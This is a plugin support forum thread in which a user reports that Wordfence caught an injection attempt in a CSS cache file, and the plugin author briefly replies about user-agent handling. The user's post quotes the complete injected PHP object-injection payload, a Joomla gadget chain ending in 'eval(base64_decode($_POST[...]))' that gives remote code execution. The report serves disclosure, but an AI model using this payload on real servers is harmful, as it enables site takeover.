Sanitize your inputs

  • Wordfence notified me about some tried code injection in a css file created by this plugin:

    
/* Original-Document: https://fonts.googleapis.com/css?family=Libre+Franklin%3A300%2C300i%2C400%2C400i%2C600%2C600i%2C800%2C800i&subset=latin%2Clatin-ext for: }__test|O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";s:54:\"eval(base64_decode($_POST[111]));JFactory::get();exit;\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}e??? replaces: 8 , version: 4 */

    So I guess at some point your input should be sanitized ??

    BTW, do you think user agent differentiation is really required? Because there are very very many different user agent strings…

Viewing 1 replies (of 1 total)
  • Plugin Author E. Marten

    (@emarten)

    Hey, thanks for your feedback.
    Google delivers different css files and font-formats depending on the browser agent-string. But I am already grouping Agents so the load of forms will decrease.
    The plugin deletes unused css already.
    Greets, Eric

Viewing 1 replies (of 1 total)
  • The topic ‘Sanitize your inputs’ is closed to new replies.